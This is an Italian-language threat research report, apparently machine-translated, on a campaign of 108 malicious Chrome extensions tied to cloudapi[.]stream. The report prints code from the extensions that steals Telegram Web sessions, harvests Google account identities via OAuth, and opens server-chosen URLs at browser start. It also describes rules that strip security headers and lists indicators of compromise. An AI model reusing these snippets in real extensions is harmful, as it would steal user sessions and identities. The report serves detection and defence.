Una campagna composta da 108 estensioni raccoglie identità, ruba sessioni e aggiunge backdoor ai browser, il tutto legato alla stessa infrastruttura C2.

  Kush Pandya

Il team di ricerca sulle minacce di Socket ha identificato 108 estensioni Chrome dannose che operano come una campagna coordinata nell'ambito di un'infrastruttura C2 condivisa su cloudapi[.]stream. Le estensioni sono pubblicate sotto cinque distinte identità di editori (Yana Project, GameGen, SideGames, Rodeo Games e InterAlt) e rappresentano collettivamente circa 20.000 installazioni del Chrome Web Store. Tutti e 108 instradano credenziali rubate, identità utente e dati di navigazione verso server controllati dallo stesso operatore. Le estensioni rimangono attive al momento della scrittura. Abbiamo inviato richieste di rimozione al team di sicurezza del Chrome Web Store e a Google Navigazione sicura.

La campagna abbraccia diverse categorie di minacce attraverso 108 estensioni:

• 54 estensioni rubare l'identità dell'account Google tramite OAuth2
• 1 estensione esfiltra attivamente le sessioni Web di Telegram ogni 15 secondi
• 1 estensione include un'infrastruttura organizzata per il furto delle sessioni di Telegram (non ancora attivata)
• 2 estensioni rimuovi le intestazioni di sicurezza di YouTube e inserisci annunci
• 1 estensione rimuove le intestazioni di sicurezza di TikTok e inserisce annunci
• 2 estensioni inserire script di contenuto in ogni pagina visitata dall'utente
• 1 estensione inoltra tutte le richieste di traduzione attraverso il server dell'autore della minaccia
• 45 estensioni contengono una backdoor universale che apre URL arbitrari all'avvio del browser
• 

• Legittimo in superficie#

  Le 108 estensioni sono pubblicate in diverse categorie di prodotti: client della barra laterale di Telegram, giochi di slot machine e Keno, potenziatori di YouTube e TikTok, uno strumento di traduzione di testo ed estensioni di utilità della pagina. Ciascuno si rivolge a un diverso tipo di utente, ma condividono tutti lo stesso backend.

  Gli utenti che installano un'estensione della barra laterale di Telegram vedono un'interfaccia di chat funzionale. Gli utenti che installano un gioco di slot ottengono un gioco funzionante. La superficie legittima esiste, ma esiste anche il codice dannoso in esecuzione in background, connesso a un server C2 che può rubare identità, esfiltrare sessioni e aprire URL arbitrari nel browser dell'utente.

  Furto di sessioni di Telegram#

  L'estensione più grave della campagna è Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa). Ruba la sessione Web attiva di Telegram dal browser della vittima e la trasmette a tg[.]cloudapi[.]stream/save_session.php ogni 15 secondi.

  Come funziona il furto:

  L'estensione inietta content.js in https://web.telegram.org/* A document_start. Al caricamento, chiama immediatamente getSessionDataJson(), che serializza l'intera pagina localStorage ed estrae il user_auth token utilizzato da Telegram Web per autenticare la sessione. Lo invia allo script in background tramite chrome.runtime.sendMessage, che lo inoltra al server C2.

  // content.js
  // Analyst note: Runs immediately on page load, before the user interacts with anything.
  let getInfo = getSessionDataJson();
  if (getInfo.user_id !== null) {
      chrome.runtime.sendMessage({ action: "save_session", data: JSON.stringify(getInfo) });
  }

  // content.js
  // Analyst note: Sends the full session to the C2 every 15 seconds for the lifetime of the tab.
  setInterval(async () => {
      let getInfo = getSessionDataJson();
      if (getInfo.user_id !== null) {
          await chrome.runtime.sendMessage({ action: "save_session", data: JSON.stringify(getInfo) });
      }
  }, 15000);

  La sceneggiatura di sfondo (background.js) quindi invia i dati al C2:

  // background.js
  let answr = await postJson('https://tg[.]cloudapi[.]stream/save_session.php', {
      uuid: result.uuid,
      session: xJsonData
  });

  Acquisizione completa dell'account:

  L'estensione gestisce anche un messaggio in entrata (set_session_changed) che esegue l'operazione inversa: cancella il localStorage della vittima, lo sovrascrive con i dati di sessione forniti dall'attore della minaccia e ricarica forzatamente Telegram. Ciò consente all'operatore di scambiare il browser di qualsiasi vittima con un altro account Telegram all'insaputa della vittima.

  // content.js
  // Analyst note: The C2 can push any session data back to the extension.
  // This replaces the victim's active Telegram session with the threat actor's chosen session.
  if (message.action === 'set_session_changed') {
      let data = JSON.parse(message.data);
      localStorage.clear();
      clearAllCookies();
      for (var k in data) { localStorage.setItem(k, data[k]); }
      setTimeout(() => { window.location = "https://web.telegram.org/k/?r_=" + Math.random(); }, 500);
  }

  Un battito cardiaco di 30 secondi (sidepanel.js) sondaggi tg[.]cloudapi[.]stream/count_sessions.php, dando all'operatore una visione in tempo reale di quante sessioni attive sono disponibili.

  Ladro di Telegram messo in scena (Teleside):

  Una seconda estensione, Web Client for Telegram - Teleside (mdcfennpfgkngnibjbpnpaafcjnhcjno, circa 1.000 installazioni), ha tutta l'infrastruttura per il furto di sessioni: rimuove gli header CSP, X-Frame-Options e CORS di Telegram tramite declarativeNetRequest, inserisce uno script di contenuto in document_start SU telegram.org, e imposta web_accessible_resources: ["*"]. Il codice antifurto attivo è assente dalla v3.8.0. L'estensione è basata su un trojan SidebarGPT base di codice. IL loadInfo() la backdoor presente nello script in background consentirebbe all'operatore di attivare o aggiornare il payload senza inviare un aggiornamento del Chrome Web Store. Inoltre, content-sidebar.html mostra un overlay di gioco d'azzardo attivo: un div gameSession impostato su display:block da cui viene pubblicato un banner a grandezza naturale multiaccount[.]cloudapi[.]stream/game.html direttamente sopra la barra laterale dell'estensione.

  Raccolta delle identità dell'Account Google#

  54 delle 108 estensioni dannose rubano l'identità dell'account Google dell'utente la prima volta che l'utente fa clic sul pulsante di accesso. Il codice è identico per tutti 54:

• chrome.identity.getAuthToken({ interactive: true }) acquisisce un token Bearer di Google OAuth2.
• L'estensione viene recuperata https://www.googleapis.com/oauth2/v3/userinfo con quel gettone.
• PUBBLICA {email, name, picture, sub} A https://mines[.]cloudapi[.]stream/auth_google.

// popup/auth.js (akebbllmckjphjiojeioooidhnddnplj, and 53 identical copies across the campaign)
// (Russian comment): // Проверка на уже авторизованного пользователя
//   ("Check for already authenticated user")

loginBtn.addEventListener("click", async () => {
  chrome.identity.getAuthToken({ interactive: true }, async (token) => {
    // Analyst note: token is a real Google OAuth2 Bearer token acquired via the
    // chrome.identity API. The user sees a standard Google sign-in prompt.
    const res = await fetch("https://www.googleapis.com/oauth2/v3/userinfo", {
      headers: { Authorization: `Bearer ${token}` }
    });
    const profile = await res.json();

    // Analyst note: The profile is sent to the threat actor's server, not to any
    // legitimate backend for the extension's stated functionality.
    const r = await fetch("https://mines[.]cloudapi[.]stream/auth_google", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        email: profile.email,
        name: profile.name,
        picture: profile.picture,
        sub: profile.sub   // Persistent Google account identifier
      })
    });
  });
});

Il token OAuth viene utilizzato localmente e non lascia mai il browser. Ciò che arriva al server dell'operatore è solo un record di identità permanente: l'e-mail, il nome e l'immagine del profilo della vittima.

IL sub Il campo è un identificatore dell'account Google stabile e multiservizio che non cambia quando un utente modifica la password o l'indirizzo email. In combinazione con l'e-mail e il nome, fornisce all'operatore un record persistente dell'identità Google di ciascuna vittima collegata all'estensione assegnata user_id sul cloudapi[.]stream back-end. Ciò non consente all'operatore di accedere all'account Google della vittima.

Tutte le 54 estensioni utilizzano gli ID client OAuth2 di soli due progetti Google Cloud: project 1096126762051 (31 ID cliente) e progetto 170835003632 (25 ID cliente). 56 ID cliente univoci su 54 estensioni riconducono tutti agli stessi due numeri di progetto, dimostrando che un unico operatore controlla tutti gli account degli editori nonostante cinque diversi nomi di editori sul Chrome Web Store.

Backdoor universale: loadInfo()#

45 le estensioni nella campagna includono una funzione identica nello script in background. Viene eseguito una volta ad ogni avvio del browser:

// background.js (present in 45 extensions, confirmed by automated grep across extracted CRX files)
// Analyst note: This runs automatically when Chrome starts and the service worker initializes.
// The server can return any URL to be opened as a new tab in the victim's browser.
async function loadInfo() {
  const response = await fetch("https://mines[.]cloudapi[.]stream/user_info", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ type: 'background', ext: chrome.runtime.id })
  });
  const result = await response.json();
  if (result && result.success && result.infoURL) {
    chrome.tabs.create({ url: result.infoURL });
  }
}
loadInfo();

Il server dell'operatore riceve l'ID dell'estensione ad ogni avvio del browser. Se la risposta include infoURL, l'estensione apre silenziosamente l'URL in una nuova scheda. Non esiste alcuna restrizione sull'URL che il server può restituire. Questo canale sopravvive al riavvio del browser e funziona indipendentemente dal fatto che l'utente apra o meno l'estensione.

In due estensioni (Page Locker e Page Auto Refresh), il loadInfo() la funzione è stilisticamente incoerente con il codice minimizzato circostante: utilizza clean async/await sintassi mentre il resto del file viene minimizzato. Ciò indica che la funzione è stata inserita dopo la scrittura del codice originale dell'estensione, coerentemente con un operatore che ha acquisito o riproposto estensioni esistenti e ha aggiunto la backdoor.

Iniezione innerHTML#

Lo stesso user_info la risposta che trasporta infoURL guida anche l'iniezione diretta del DOM su 78 estensioni. Ogni estensione di gioco e casinò nella campagna include a userpage.js file che prende due campi dalla risposta C2 e li scrive nella pagina utilizzando innerHTML senza sanificazione:

  // app/userpage.js (present across 78 extensions)
  // Analyst note: result.rating and result.protxt arrive from mines[.]cloudapi[.]stream/user_info.
  // No sanitization before DOM assignment — the C2 can push arbitrary HTML to any user's extension page.
  if (result.rating) {
      ratingPlayers.innerHTML = result.rating;
  }
  if (result.protxt) {
      proplansID.innerHTML = result.protxt;
      proplansID.classList.remove('h_');
  }

result.rating popola il pannello della classifica. result.protxt popola la sezione di upsell dei Piani Pro e la nasconde. Il server C2 può sostituire entrambi i campi con HTML arbitrario, inclusi blocchi di script, ad ogni visita all'interfaccia utente dell'estensione. Questo è un canale di injection distinto da loadInfo(): dove la backdoor apre una nuova scheda, l'iniezione di contenuto controllata dal server riscrive l'interfaccia dell'estensione.

Bypass dell'intestazione di sicurezza tramite dichiarativeNetRequest#

Cinque estensioni utilizzano Chrome declarativeNetRequest API per rimuovere le intestazioni di sicurezza dai siti di destinazione prima che la pagina venga caricata. Lo schema è identico per tutti e cinque: rimuovi Content-Security-Policy, X-Frame-Options, E Content-Security-Policy-Report-Only; impostato Access-Control-Allow-Origin: *; e falsificare il User-Agent, Origin, E Referer intestazioni per rappresentare il sito di destinazione stesso.

Le cinque estensioni e i loro obiettivi:

• Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa): obiettivi web.telegram.org, fa lo spoofing dell'User-Agent su iPhone Safari
• Teleside (mdcfennpfgkngnibjbpnpaafcjnhcjno): obiettivi web.telegram.org, fa lo spoofing dell'User-Agent su iPhone Safari
• YouSide (mmecpiobcdbjkaijljohghhpfgngpjmk): obiettivi youtube.com, fa lo spoofing dell'User-Agent su Chrome 140
• SideYou (bfoofgelpmalhcmedaaeogahlmbkopfd): obiettivi youtube.com, fa lo spoofing dell'User-Agent su Chrome 125
• Web Client for TikTok (cbfhnceafaenchbefokkngcbnejached): obiettivi www.tiktok.com, fa lo spoofing dell'User-Agent su Chrome 125

Tutti e cinque sono stati confermati dalla lettura rules_1.json direttamente da ogni file CRX estratto.

YouSide inserisce inoltre un overlay di gioco d'azzardo nella sua barra laterale: a gameSession div impostato su display:block inserendo un banner pubblicitario da multiaccount[.]cloudapi[.]stream/game.html sull'incorporamento di YouTube.

L'estensione TikTok ne aggiunge un secondo declarativeNetRequest regola che consente incondizionatamente tutte le connessioni WebSocket su tutti gli URL, rimuovendo qualsiasi restrizione a livello di rete sul traffico WebSocket dalle pagine TikTok. La sua sceneggiatura del contenuto (sys-content.js) inserisce un collegamento e un'immagine da multiaccount[.]cloudapi[.]stream/game.html in ogni pagina TikTok visitata dall'utente.

IL ukraine.html Il file in bundle con l'estensione TikTok funge da politica sulla privacy. Contiene l'e-mail di contatto kiev3381917@gmail[.]com e porta il titolo della pagina "Informativa sulla privacy - Estensione della barra laterale di Telegram", un artefatto copia-incolla da un'estensione diversa nella campagna che conferma che lo stesso autore ha scritto entrambi.

Procura di traduzione#

Text Translation (ogogpebnagniggbnkbpjioobomdbmdcj) si presenta come una barra laterale di traduzione standard. Quando un utente si registra, il estensione invia la propria email e il nome completo a https://api[.]cloudapi[.]stream:8443/Register e riceve in cambio una chiave API.

// main.js
// Analyst note: User email and name are sent to the threat actor's server at registration.
// The returned API key is stored in localStorage and attached to every translation request.
const url = 'https://api[.]cloudapi[.]stream:8443/Register';
// ...
localStorage.setItem('settings', JSON.stringify({
    email: $("#email").val(),
    name: $("#name").val(),
    key: result_.key
}));

Ogni richiesta di traduzione viene elaborata https://api[.]cloudapi[.]stream:8443/Translation con la chiave API dell'utente allegata come file X-Key intestazione. Il server dell'operatore riceve il testo completo di tutto ciò che l'utente invia per la traduzione. Questa estensione richiede solo il file sidePanel autorizzazione e nessuna autorizzazione host, quindi non genera avvisi di autorizzazione durante l'installazione.

Infrastruttura C2#

Tutte le 108 estensioni dannose condividono lo stesso backend, ospitato su 144[.]126[.]135[.]238 (Contabo GmbH VPS). Il dominio cloudapi[.]stream è stato registrato il 30 aprile 2022 tramite Hosting Ukraine LLC. Il server esegue un'istanza Strapi CMS sulla porta 1337 con un database PostgreSQL.

I sottodomini confermati e i loro ruoli:

• tg[.]cloudapi[.]stream: Esfiltrazione della sessione di Telegram, sei endpoint inclusi /save_session.php, /get_sessions.php, /delete_session.php, E /count_sessions.php (7 estensioni)
• mines[.]cloudapi[.]stream: furto d'identità tramite /auth_google, Faro C2 tramite /user_info (ritorna infoURL per l'apertura remota delle schede), persistenza dello stato utente (utilizzato da 94 estensioni)
• topup[.]cloudapi[.]stream: portale di pagamento e monetizzazione, confermando il modello MaaS (collegato da 78 estensioni)
• cdn[.]cloudapi[.]stream: hosting di risorse di gioco (79 estensioni)
• multiaccount[.]cloudapi[.]stream: hub di iniezione di annunci, inserito direttamente in TikTok e altre pagine (29 estensioni)
• gamewss[.]cloudapi[.]stream: Server di gioco WebSocket sulla porta 8447 (6 estensioni)
• wheel[.]cloudapi[.]stream: preposizionato in host_permissions di 76 estensioni ma non utilizzato in nessun codice osservato
• api[.]cloudapi[.]stream:8443: API di traduzione, registrazione utente e sorveglianza dei contenuti (1 estensione)
• chat[.]cloudapi[.]stream: servizio chat (5 estensioni)

Un dominio secondario, top[.]rodeo, è elencato in host_permissions di 71 estensioni e utilizzato come backend del server di gioco. Nel codice sorgente compaiono due varianti di endpoint: /server/remote.php E /server/remote3.php, entrambi accettano uuid E extension_id parametri. IL topup[.]cloudapi[.]stream portale di pagamento e per utente user_id il sistema conferma che funziona come piattaforma Malware-as-a-Service. Alle vittime vengono assegnati account nel CRM backend e le identità e le sessioni rubate sono accessibili a chiunque acquisti l'accesso.

Violazioni delle norme del Chrome Web Store#

1. Contraddizione diretta della dichiarazione sulla privacy di CWS

L'elenco CWS di ogni estensione contiene un boilerplate dichiarazione: "Questo sviluppatore dichiara che i tuoi dati non vengono utilizzati o trasferiti per scopi estranei alla funzionalità principale dell'articolo." Il codice di invio user_id A mines[.]cloudapi[.]stream/user_info ad ogni avvio del browser, raccogliendo l'identità di Google tramite auth_google, e l'apertura di URL specificati dall'operatore non ha nulla a che fare con la funzione dichiarata di un gioco di slot o di un client Telegram. Questa è una bugia verificabile nell'elenco stesso, non un'interpretazione.

2. Norme sui dati utente dei servizi API di Google: utilizzo limitato

Estensioni utilizzando chrome.identity.getAuthToken sono vincolati da Google Requisiti di utilizzo limitato. I dati del profilo ottenuti tramite OAuth2 devono essere utilizzati solo per la funzionalità attivata esplicitamente dall'utente. Instradarlo a un server C2 di terze parti senza alcuna relazione rivelata con l'estensione è una violazione diretta indipendentemente dal fatto che il token stesso venga esfiltrato.

3. Politica sugli annunci CWS

Iniezione di un overlay per il gioco d'azzardo (multiaccount[.]cloudapi[.]stream/game.html) nell'interfaccia utente dell'estensione senza il consenso dell'utente o la divulgazione nell'elenco CWS viola il Chrome Web Store politica richiedendo che qualsiasi pubblicità sia chiaramente divulgata. In Teleside e YouSide l'annuncio sostituisce interamente l'interfaccia utente indicata.

Attribuzione#

L'e-mail di contatto kiev3381917@gmail[.]com appare in ukraine.html, un file HTML di politica sulla privacy in bundle con l'estensione SideYou (bfoofgelpmalhcmedaaeogahlmbkopfd). Lo stesso file viene riutilizzato tra le estensioni: la copia trovata in Web Client for TikTok porta invariato il titolo "Privacy Policy - Estensione Sidebar Telegram", collegando direttamente le due estensioni allo stesso autore.

Tre dei sette indirizzi email registrati contengono varianti romanizzate della stessa stringa “nadejdin” e “nadiezhdin”: nadejdinv@gmail[.]com (collegato a 16 estensioni), viktornadiezhdin@gmail[.]com (12 estensioni) e slava.nadejdin.kiev@gmail[.]com (2 estensioni).

I commenti al codice in russo compaiono nel codice di autenticazione e di furto di sessione su più estensioni. In content.js , il commento recita "userId ne najden" (userId non trovato) e in auth.js , si legge "Proverka na uzhe avtorizovannogo pol'zovatelya" (Controlla se l'utente è già autenticato).

Scansione Shodan di 144[.]126[.]135[.]238 confermando l'hosting di Contabo Inc., ISP Nubes LLC (AS40021) e nove porte aperte tra cui un server API Strapi su 1337 e PostgreSQL su 5432.

Cinque nomi di editori sul Chrome Web Store (Yana Project, GameGen, SideGames, Rodeo Games, E InterAlt) si risolvono tutti negli stessi due numeri di progetto Google Cloud: 1096126762051 E 170835003632. Questa è la prova più forte a favore della proprietà unificata, poiché 56 ID client OAuth2 univoci in tutte le 54 estensioni per il furto di identità condividono solo queste due radici del progetto.

Impatto#

Gli utenti che hanno installato una delle 54 estensioni per il furto di identità e hanno fatto clic sul pulsante di accesso hanno ricevuto l'e-mail di Google, il nome completo, l'URL dell'immagine del profilo e l'identificatore dell'account Google (sub) trasmesso a mines[.]cloudapi[.]stream/auth_google. IL sub il valore non cambia quando un utente modifica la password o l'indirizzo e-mail.

Utenti che hanno installato Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa) e aperto web.telegram.org mentre l'estensione era attiva, la sessione Web di Telegram è stata esfiltrata a intervalli di 15 secondi. Un autore di minacce con una sessione rubata può accedere a tutti i messaggi, i contatti e gli account collegati senza la password dell'utente o il codice di autenticazione a due fattori.

Qualsiasi browser con uno dei 45 loadInfo() le estensioni backdoor installate rispondono ai comandi emessi dal server ad ogni avvio del browser, anche se l'utente non apre mai l'estensione.

In tutte le 108 estensioni, sono state registrate circa 20.000 installazioni. Le estensioni destinate a Telegram rappresentano circa 3.035 di tali installazioni.

Prospettive e raccomandazioni#

Per gli utenti:

• Cerca tra le estensioni Chrome installate uno qualsiasi degli ID estensione nella sezione IOC di seguito e rimuovili immediatamente.
• Se hai usato Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa) mentre sei connesso a Telegram Web, esci da tutte le sessioni di Telegram Web dall'app mobile di Telegram in Impostazioni > Dispositivi > Termina tutte le altre sessioni.
• Se hai effettuato l'accesso a qualsiasi estensione di giochi di slot, casinò o barra laterale utilizzando Google, tratta la tua identità Google come esposta. Controlla l'accesso alle app di terze parti su myaccount.google.com/permissions e revocare eventuali voci sconosciute.
• Se hai installato Text Translation (ogogpebnagniggbnkbpjioobomdbmdcj) e registrato con la tua e-mail, l'indirizzo e-mail e il nome vengono archiviati sul server dell'autore della minaccia.

Per le squadre di sicurezza:

• Bloccare cloudapi[.]stream e tutti i suoi sottodomini a livello di rete. L'elenco completo è nella sezione CIO di seguito.
• Bloccare top[.]rodeo.
• Contrassegna le estensioni di Chrome nel tuo ambiente che dichiarano il file identity permesso a fianco oauth2 ID cliente dai numeri di progetto Google Cloud 1096126762051 O 170835003632.
• IL loadInfo() modello (POST a /user_info all'avvio dell'operatore del servizio con l'ID estensione, aprire infoURL dalla risposta) è un'impronta digitale rilevabile. Scansiona i pacchetti di estensioni per la combinazione di user_info, infoURL, E chrome.tabs.create.
• declarativeNetRequest regole che rimuovono content-security-policy provenienti da siti di destinazione specificati non rappresentano un comportamento standard e richiedono una revisione in qualsiasi estensione.

Presa Protezione dell'estensione Chrome analizza i bundle di estensioni per rilevare flussi di dati nascosti, esfiltrazione di credenziali non divulgate e backdoor C2, bloccando le estensioni dannose prima che raggiungano gli endpoint dell'utente.

ATT&CK MITRA#

• T1176 - Estensioni del browser
• T1539 - Ruba cookie di sessione Web
• T1528 - Ruba token di accesso all'applicazione
• T1041 - Esfiltrazione sul canale C2
• T1071.001 - Protocollo del livello applicazione: protocolli Web
• T1027 - File o informazioni offuscati
• T1185 - Dirottamento della sessione del browser

Indicatori di compromesso (IOC)#

Identificatori degli attori della minaccia

Indirizzo e-mail

• kiev3381917@gmail[.]com
• formatron.service@gmail[.]com
• nashprom.info@gmail[.]com
• viktornadiezhdin@gmail[.]com
• support@top[.]rodeo
• slava.nadejdin.kiev@gmail[.]com
• nadejdinv@gmail[.]com

Nome dell'editore

• Yana Project
• GameGen
• SideGames
• Rodeo Games
• InterAlt

Credenziali del progetto

• Progetto Google Cloud: 1096126762051
• Progetto Google Cloud: 170835003632

Indicatori di rete

• cloudapi[.]stream
• tg[.]cloudapi[.]stream
• mines[.]cloudapi[.]stream
• topup[.]cloudapi[.]stream
• cdn[.]cloudapi[.]stream
• multiaccount[.]cloudapi[.]stream
• wheel[.]cloudapi[.]stream
• gamewss[.]cloudapi[.]stream
• api[.]cloudapi[.]stream
• chat[.]cloudapi[.]stream
• crm[.]cloudapi[.]stream
• top[.]rodeo
• metal[.]cloudapi[.]stream
• 144[.]126[.]135[.]238
• coin-miner[.]cloudapi[.]stream
• goldminer[.]cloudapi[.]stream
• herculessportslegend[.]cloudapi[.]stream

Endpoint C2

• tg[.]cloudapi[.]stream/save_session.php
• tg[.]cloudapi[.]stream/count_sessions.php
• tg[.]cloudapi[.]stream/get_sessions.php
• tg[.]cloudapi[.]stream/get_session.php
• tg[.]cloudapi[.]stream/delete_session.php
• tg[.]cloudapi[.]stream/save_title.php
• mines[.]cloudapi[.]stream/auth_google
• mines[.]cloudapi[.]stream/user_info
• mines[.]cloudapi[.]stream/slot_test/
• api[.]cloudapi[.]stream:8443/Register
• api[.]cloudapi[.]stream:8443/Translation
• top[.]rodeo/server/remote.php
• top[.]rodeo/server/remote3.php
• top[.]rodeo/notify.php
• cloudapi[.]stream/install/
• cloudapi[.]stream/uninstall/

ID estensione Chrome

1. obifanppcpchlehkjipahhphbcbjekfa - Multiaccount Telegram
2. mdcfennpfgkngnibjbpnpaafcjnhcjno - Client Web per Telegram - Teleside
3. mmecpiobcdbjkaijljohghhpfgngpjmk - YouSide - Barra laterale di Youtube
4. bfoofgelpmalhcmedaaeogahlmbkopfd - Client Web per Youtube - SideYou
5. cbfhnceafaenchbefokkngcbnejached - Client Web per TikTok
6. ogogpebnagniggbnkbpjioobomdbmdcj - Traduzione del testo
7. ldmnhdllijbchflpbmnlgndfnlgmkgif - Blocco pagine
8. lnajjhohknhgemncbaomjjjpmpdigedg - Aggiornamento automatico della pagina
9. aecccajigpipkpioaidignbgbeekglkd - Client Web per Rugby Rush - SideGame
10. akebbllmckjphjiojeioooidhnddnplj - Gioco di corse di Formula Rush
11. akifdnfipbeoonhoeabdicnlcdhghmpn - Premi Piggy - Slot Machine
12. akkkopcadaalekbdgpdikhdablkgjagd - Slot araba
13. alkfljfjkpiccfgbeocbbjjladigcleg - Rana fantastica
14. alllblhkgghelnejlggmmgjbkdabidie - Slot machine Barba Nera
15. amkkjdjjgiiamenbopfpdmjcleecjjgg - Indiano: slot machine
16. amnaljnjmgajgajelnplfmidgjgbjfhe - Mahjong Deluxe
17. bbjdlbemjklojnbifkgameepcafflmem - Calcio di punizione pazzesco
18. bdnanfggeppmkfhkgmpojkhanoplkacc - Corse di slot car
19. bgdkbjcdecedfoejdfgeafdodjgfohno - Cancella cache Plus
20. bnchgibgpgmlickioneccggfobljmhjc - Galactica Delux - Slot machine
21. bpljfbcejldmgeoodnogeefaihjdgbam - Test di velocità per Chrome - Test di velocità WiFi
22. cbnekafldflkmngbgmbnfmchjaelnhem - Gioco SkySpeedster
23. cdpiopekjeonfjeocbfebemgocjciepp - Maestro degli scacchi
24. cehdkmmfadpplgchnbjgdngdcjmhlfcc - Sparatoria di hockey
25. cljengcehefhflhoahaambmkknjekjib - Le probabilità degli dei - Slot machine
26. clpgopiimdjcilllcjncdkoeikkkcfbi - Biliardo professionista
27. cmeoegkmpbpcoabhlklbamfeidebgmdf - Poker a tre carte
28. cmlbghnlnbjkdgfjlegkbjmadpbmlgjb - Ciambelle - Slot Machine
29. cnibdhllkgidlgmaoanhkemjeklneolk - Arciere - Slot machine
30. cpnfioldnmhaihohppoaebillnambcgn - Corsa al rugby
31. dbohcpohlgnhgjmfkakoniiplglpfhcb - Bingo
32. dcamdpfclondppklabgkfaofjccpioil - Client Web per il gioco Cricket Batter Challenge
33. dljlpildgknddpnahppkihgodokfjbnd - Slot machine Zeus Tesori
34. dlpiookhionidajbiopmaajeckifeehn - Corse di cavalli
35. dmaibhbbpmdihedidicfeigilkbobcog - Azteco: slot machine
36. dohenclhhdfljpjlnpjnephpccbdgmmb - Dritto 4
37. dpdemambcedffmnkfmkephnhhnclmcio - Slot la pentola d'oro
38. ejlcbfmhjbkgohopdkijfgggbikgbacb - Roulette americana reale
39. eljfpgehlncincemdmmnebmnlcmfamhm - Slot Asia
40. enmmilgindjmffoljaojkcgloakmloen - Client Web per il gioco Drive Your Car
41. eoklnfefipnjfeknpmigmogeeepddcch - Giganti giurassici - Slot machine
42. fddajeklkkggbnppabbhkdmnkdjindlo - Basket di strada
43. fibgndhgobbaaekmnneapojgkcehaeac - Pannello laterale dei Tarocchi
44. fjfhejmbhpabkacpoddjbcfandjoacmb - L'uccisore di draghi: slot machine
45. flkdjodmoefccepdihipjdlianmkmhgc - Il miglior blackjack
46. fmajpchoiahphjiligpmghnhmabolhoh - Libro Di Magia - Slot Machine
47. gaafhblhbnkekenogcjniofhbicchlke - Serpente: slot machine
48. gbaoddbbpompjhmilbgiaapkkakldlpc - Dice King - Classico gioco di dadi e lanci
49. gbhhgipmedccnankkjchgcidiigmioio - Slot Ramses
50. gfhcdakcnpahfdealajmhcapnhhablbp - Guerra delle corazzate
51. gipmochingljoikdjakkdolfcbphmlom - Minatore d'oro 2
52. glofhphmolanicdaddgkmhfmjidjkaem - Corse di levrieri - Simulatore di corse di cani
53. haochenfmhglpholokliifmlpafilfdc - Ercole: leggenda dello sport
54. hbobdcfpgonejphpemijgjddanoipbkj - Calcio veloce
55. hdmppejcahhppjhkncagagopecddokpi - Magia Voodoo: slot machine
56. heljkmdknlfhiecpknceodpbokeipigo - Client Web per sparatorie di hockey - SideGame
57. hiofkndodabpioiheinoiojjobadpgmj - MAESTRO DAMA
58. hkbihmjhjmehlocilifheeaeiljabenb - Corsa alle moto d'acqua
59. hlmdnedepbbihmbddepemmbkenbnoegd - Corsa in auto
60. hmlnefhgicedcmebmkjdcogieefbaagl - Videopoker Deuces Wild
61. hnpbijogiiaegambgpaenjbcbgaeimlf - Slot machine Ultimate Soccer
62. ibelidmkbnjmmpjgfibbdbkamgcbnjdm - Vigilia di Natale: slot machine
63. ihbkmfoadnfjgkpdmgcboiehapkiflme - Viaggio a Columbus: slot machine
64. ijccacgjefefdpglhclnbpfjlcbagafm - Gioco da casinò alto o basso
65. ijfmkphjcogaealhjgijjfjlkpdhhojk - Sfida tra portieri
66. ijpgccpmogehkjhdmomckpkfcpbjlmnj - Spiaggia tropicale - Slot machine
67. imjmnghlhiimodfkdkgnfplhlobehnpm - Black Jack 3D
68. jddinhnhplibccfmniaakhffpjpnaglp - Client Web per il gioco Classic Bowling
69. jmopjanoebpdbopigcbpjhiigmjolikk - Miniere di Zeus infuriate
70. jnmmbmkmbkcccpihjgnhjmhhkokfdnfe - Backgammon classico
71. jodocbbdcdclkhjkibnlfhbmllcpfkfo - Slot Machine I Frutti
72. kahcolfecjbejjjadhjafmihdnifonjf - Baccarà
73. kblomapfkjidbbbdllmofkcakcenkmec - Il mondo del minigolf
74. kbmindomjiejdikjaagfdbdfpnlanobi - Corsa all'oro - Slot machine
75. kbnkkecifeppobnemkielnpagifkobki - Slot Pirata
76. kjnakdbpijigdbfepipnbafnhbcfdkga - 40 Corona Imperiale - Slot Machine
77. kknakidneabpfgepadgpkibalcnabnnh - 3Slot machine D Calcio
78. klglejfbdeipgklgaepnodpjcnhaihkd - Corse di cavalli premium
79. kmiidcaojgeepjlccoalkdimgpfnbagj - Gioco dei carri armati
80. lcijkepobdokkgmefebkiejhealgblle - Poker caraibico
81. lefndgfmmbdklidbkeifpgclmpnhcilg - Bufalo selvaggio - Slot machine
82. lfkknbmaifjomagejflmjklcmpadmmdg - Acqua - Slot machine
83. ljbgkfbiifhpgpipepnfefijldolkhlm - Gioco Fusione crittografica
84. lmcpbhamfpbonaenickjclacodolkbdl - Foresta di Sherwood - Slot machine
85. lmgenhmehbcolpikplhkoelmagdhoojn - Client Web per il gioco Fatboy Dream
86. maeccdadgnadblfddcmanhpofobhgfme - Jackpot Lone Star - Slot machine
87. medkneifmjcpgmmibfppjpfjbkgbgebl - Gioco del gattino nascosto
88. mheomooihiffmcgldolenemmplpgoahn - Keno
89. mmbbjakjlpmndjlbhihlddgcdppblpka - Jokers Bonanza - Slot machine
90. mmbkmjmlnhocfcnjmbchmflamalekbnb - Calci di rigore
91. nbgligggjfgkpphhghhjdoiefbimgooc - Poker Pai Gow
92. ncpdkpcgmdhhnmcjgiiifdhefmekdcnf - Calcolatore di metalli
93. ndajcmifndknmkckdcdefkpgcodciggk - Fattoria - Slot machine
94. nelbpdjegmhhgpfcjclhdmkcglimkjpp - Puzzle del labirinto ferroviario
95. nkacmelgoeejhjgmmgflbcdhonpaplcg - GIOCO DI CARTE CANE ROSSO
96. nmegibgeklckejdlfhoadhhbgcdjnojb - Minatore di monete 2
97. nodobilhjanebkafmpihkpoabiggnnfl - Ninja Nero - Slot machine
98. oanpifaoclmgmflmddlgkikfaggejobn - Solitario Piramide
99. ocflhkadmmnlbieoiiekfcdcmjcfeahe - Client Chrome per sci alpino - SideGame
100. odeccdcabdffpebnfancpkepjeecempn - Slot machine Signor Pollo
101. oejhnncfanbaogjlbknmlgjpleachclf - Client Web per la roulette francese - SideGame
102. ogbaedmbbmmipljceodeimlckohbnfan - 3Gioco del casinò D Roulette
